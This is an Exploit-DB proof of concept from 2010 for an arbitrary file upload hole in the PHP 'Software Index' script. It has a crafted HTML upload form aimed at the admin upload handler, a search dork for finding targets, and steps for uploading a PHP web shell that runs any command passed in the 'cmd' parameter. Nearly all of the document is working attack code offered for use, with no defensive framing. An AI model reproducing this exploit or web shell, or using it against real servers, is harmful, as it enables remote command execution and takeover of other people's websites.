Software Index - Arbitrary File Upload

EDB-ID:

13999

CVE:

N/A




Platform:

PHP

Date:

2010-06-23


######################################################################## 

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home :

# Bug  : Up

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Copyright 2010. Software Index       
                                                                 
# Exploit By indoushka 

	<html>
<head>
<Title>Select Image File for uploading</Title>

<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}

</script>


</head>

<body>
<b><font size="3">Upload Image</font>.</b> 
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"> 
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b> 
        <table>
          <tr> 
            <td valign="top" width="15"><font color="#000000">1.</font></td>
            <td width="470"><font color="#000000">To add an Attachment, click 
              the 'Browse' button to select the file to attach, or type the path 
              to the file in the Text-box below.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">2.</font></td>
            <td width="470"><font color="#000000">Then click Upload button to 
              complete the upload</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">3.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File transfer can take from a few seconds upto a few minutes 
              depending on the size of the attachment. Please be patient while 
              the attachment is being uploaded.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">4.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File will be renamed if the file with the same name is present</font></td>
          </tr>
        </table>
      </TD>
    </TR> 
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR> 
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
  </TD></TR>
  <TR><TD> </TD></TR>
  <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the 
file is completely transferred.<BR><BR></TD></TR>
</table>

</FORM>

   
<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->

</body>

</html>

1 - Save as php or html and upload to your localhost or server 

2 - use Backdoor 

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

3 - you see where the file uploaded

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------